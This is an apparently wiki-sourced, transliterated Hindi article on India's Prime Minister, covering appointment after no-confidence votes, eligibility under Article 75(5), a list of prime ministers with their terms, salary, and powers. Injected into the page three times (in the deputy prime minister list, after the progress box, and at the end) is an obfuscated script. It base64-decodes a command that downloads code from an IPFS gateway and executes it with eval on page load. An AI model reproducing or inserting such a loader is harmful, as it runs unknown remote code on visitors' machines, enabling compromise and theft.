jab karyarat mantriparishad ke viruddh lokasabha mean avishvas prastav parit ho jata hai, to mantriparishad ko tyagapatr dena p data hai. aisi sthiti mean rashtrapati lokasabha mean vipaksh ke neta ko sarakar banane ke lie amantrit karata hai, lekin usake inkar karane par us vyakti ko, jise kee daloan ka samarthan prapt ho, sarakar banane ke lie amantrit karata hai aur unhean nirdesh deta hai ki sarakar ke gathan ke pashchath ek mas ke aantargat apana bahumat siddh kare. 1979 mean tatkalin pradhanamantri moraraji desaee ke tyagapatr ke bad rashtrapati ne lokasabha mean vipaksh ke neta vaee. bi. chavhan ko sarakar banane ke lie amantrit kiya tha, lekin unake inkar karane par kee daloan se samarthan prapt karane vale charan sianh ko sarakar banane ke lie amantrit kiya gaya tha.

pradhanamantri pad ki yogyata

pradhanamantri ki yogyata ke sambandh mean sanvidhan mean koee spasht pravadhan nahian kiya gaya hai, lekin itana avashy kaha gaya hai ki pradhanamantri lokasabha mean bahumat prapt dal ka neta hoga. lokasabha mean bahumat prapt dal ka neta hone ke lie avashyak hai ki neta lokasabha ka sadasy ho. isalie pradhanamantri ko sadharanat: lokasabha ka sadasy hone ki yogyata rakhani chahie. yadi koee vyakti, jo ki lokasabha ka sadasy nahian hai, pradhanamantri ke pad par niyukt kiya jata hai to use chh: mas ke aantargat lokasabha ka sadasy hona p data hai. udaharanarth, 1967 mean iandira gaandhi (tatsamay rajyasabha ki sadasy thi) tatha 1991 mean jab pi. vi. narasianharav pradhanamantri pad par niyukt kiye gaye, tab ve lokasabha ke sadasy nahian the, lekin unhoanne 6 mas ke aantargat lokasabha ka chunav l dakar sansad ki sadasyata prapt ki thi. pradhanamantri ke lie lokasabha ki sadasyata anivary nahian hai. use vastut: sansad ke donoan sadanoan mean se kisi ek sadan arthath lokasabha ya rajyasabha ka sadasy anivaryat: hona chahie. 1997 mean pradhanamantri pad par niyukt indr kumar gujaral tatha bad mean 2004 mean niyukt pradhanamantri d aau. manamohan sianh rajyasabha ke sadasy rahe haian.

bharat ke pradhanamantri evan karyakal
kramaank nam karyakal chitr
(1) javahar lal neharoo 26 faravari, 1950 se 27 mee, 1964 javahar lal neharoo|50px|link=javahar lal neharoo
gulazari lal nanda

(karyavahak)

27 mee, 1964 se 9 joon, 1964 gulazari lal nanda|50px|link=gulazari lal nanda
(2) lal bahadur shastri 9 joon, 1964 se 11 janavari, 1966 lal bahadur shastri|50px|link=lal bahadur shastri
gulazari lal nanda

(karyavahak)

11 janavari, 1966 se 24 janavari 1966 gulazari lal nanda|50px|link=gulazari lal nanda
(3) shrimati iandira gaandhi 24 janavari, 1966 se 24 march, 1977 iandira gaandhi|50px|link=iandira gaandhi
(4) moraraji desaee 24 march, 1977 se 28 julaee, 1979 moraraji desaee|50px|link=moraraji desaee
(5) charan sianh chaudhari 28 julaee, 1979 se 14 janavari, 1980 charan sianh chaudhari|50px|link=charan sianh chaudhari
shrimati iandira gaandhi 14 janavari, 1980 se 31 aktoobar, 1984 iandira gaandhi|50px|link=iandira gaandhi
(6) rajiv gaandhi 31 aktoobar, 1984 se 1 disambar, 1989 rajiv gaandhi|50px|link=rajiv gaandhi
(7) vishvanath pratap sianh 1 disambar, 1989 se 10 navambar, 1990 vishvanath pratap sianh|50px|link=vishvanath pratap sianh
(8) chandrashekhar sianh 10 navambar, 1990 se 21 joon, 1991 chandrashekhar sianh|50px|link=chandrashekhar sianh
(9) pi. vi. narasianh rav 21 joon, 1991 se 16 mee, 1996 pi. vi. narasianh rav|50px|link=narasianh rav pi. vi.
(10) atal bihari vajapeyi 16 mee, 1996 se 1 joon, 1996 atal bihari vajapeyi|50px|link=atal bihari vajapeyi
(11) ech. di. devagau da 1 joon, 1996 se 21 aprail, 1997 ech. di. devagau da|50px|link=ech. di. devagau da
(12) indr kumar gujaral 21 aprail, 1997 se 19 march, 1998 indr kumar gujaral|50px|link=indr kumar gujaral
atal bihari vajapeyi 19 march, 1998 se 22 mee, 2004 atal bihari vajapeyi|50px|link=atal bihari vajapeyi
(13) d aau. manamohan sianh 22 mee, 2004 se 26 mee, 2014 d aau. manamohan sianh|50px|link=manamohan sianh
(14) narendr modi 26 mee, 2014 se ab tak narendr modi|50px|link=narendr modi

sansad ke kisi sadan ka sadasy n hone par bhi koee vyakti pradhanamantri pad par niyukt ho sakata hai. anuchchhed 75 (5) ke anusar yadi koee vyakti chh: mah ke andar sansad ke kisi sadan ka sadasy nahian ban jata hai, to vah pradhanamantri pad par bane nahian rah sakata hai. isaka arth hai ki bahari vyakti bhi pradhanamantri pad par niyukt ho sakata hai. lekin use chh: mahine ke bhitar sansad ke kisi sadan ka sadasy ban jana chahie. yadi vah is avadhi ke bhitar sansad ke kisi sadan ka sadasy nahian ban pata hai to use apane pad se istifa de dena p dega. dhyatavy hai ki 1996 mean jab ech. di. devagau da pradhanamantri niyukt hue the tab ve kisi bhi sadan ke sadasy nahian the. unaki niyukti ko es. pi. anand ne is adhar par nyayalay mean chunauti di thi ki isase anuchchhed 14, 21 aur 75 ka ullanghan hota hai. lekin sarvochch nyayalay ne is mamale par apana nirnay sunate hue kaha ki anuchchhed 75 (5) ke anusar yah niyukti vidhimany hai.[1]

padavadhi

samanyataya pradhanamantri apane pad grahan ki tithi se lokasabha ke agale chunav ke bad mantrimandal ke gathan tak pradhanamantri pad par bana rah sakata hai, lekin isake pahale bhi vah

  1. rashtrapati ko tyagapatr dekar padamukt ho sakata hai, ya
  2. lokasabha mean avishvas prastav parit hone ke karan pad tyag karata hai, ya
  3. rashtrapati ke dvara barkhast kiya ja sakata hai.

vetan evan bhatte

pradhanamantri ko pratimah 1 lakh 25 hazar rupaye vetan ke roop mean milate haian. sath hi unhean muft avas, yatra, chikitsa, telifon adi ki suvidhaean karayi jati haian. bhatte ke roop mean pradhanamantri ko nirvachan kshetr, akasmik kharch, any kharche evan di.e. adi diya jata hai.

adhikar evan kary

pradhanamantri ke nimnalikhit kary evan adhikar haian–

  1. pradhanamantri apane mantrimandal ke any sadasyoan ko niyukt karane, mantrimandal se barkhast karane tatha mantrimandal se unake tyagapatr ko svikar karane ki sifarish rashtrapati se karata hai (anuchchhed 75 (1)).
  2. vah apane mantrimandal ke sadasyoan ko vibhag ka abantan kar sakata hai tatha kisi mantri ko ek vibhag se doosare vibhag mean antarit kar sakata hai.
  3. pradhanamantri mantrimandal ka pradhan hota hai aur usaki mrityu ya tyagapatr se mantrimandal ka vighatan ho jata hai[2].
  4. pradhanamantri ka yah kartavy hai ki vah sangh ke karyakalap ke prashasan sambandhi aur vidhan vishayak ki soochana rashtrapati ko de aur yadi rashtrapati kisi aise vishay par pradhanamantri se soochana maangata hai, to pradhanamantri rashtrapati ko soochana dene ke lie badhy hai (anuchchhed 78).
  5. pradhanamantri mantrimandal ki baithak ki adhyakshata karata hai.
  6. yadi rashtrapati chahata hai ki kisi bat par mantriparishad vichar kare to vah pradhanamantri ko sansoochana deta hai.

up-pradhanamantri

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bharatiy sanvidhan mean up-pradhanamantri pad ki koee vyavastha nahian hai. isake bavajood samay-samay par is pad ki vyavastha ki jati rahi hai. is pad ka ab tak 7 bar srijan kiya gaya hai. pahali bar is pad ka srijan pratham lokasabha ke dauran pradhanamantri javahar lal neharoo dvara kiya gaya tha. is prakar saradar ballabh bhaee patel up-pradhanamantri pad ko sushobhit karane vale pratham vyakti the.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. in pradhanamantriyoan mean se 3 pradhanamantri, pandit javahar lal neharoo, lal bahadur shastri tatha shrimati iandira gaandhi ki mrityu unake karyakal ke hi dauran huee thi. javahar lal neharoo tatha lal bahadur shastri ki mrityu ke bad do bar gulazarilal nanda ne karyavahak pradhanamantri ke roop mean kary kiya tha. charan sianh tatha atal bihari vajapeyi aise pradhanamantri the, jinhoanne lokasabha mean vishvas mat prapt karane ke pahale hi tyagapatr de diya tha. jabaki vishvanath pratap sianh tatha ech. di. devagau da aise pradhanamantri haian, jinhoanne lokasabha mean vishvas mat prapt karane mean asaphal rahane ke karan tyag patr de diya tha.
  2. (anuchchhed 74 (1))

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>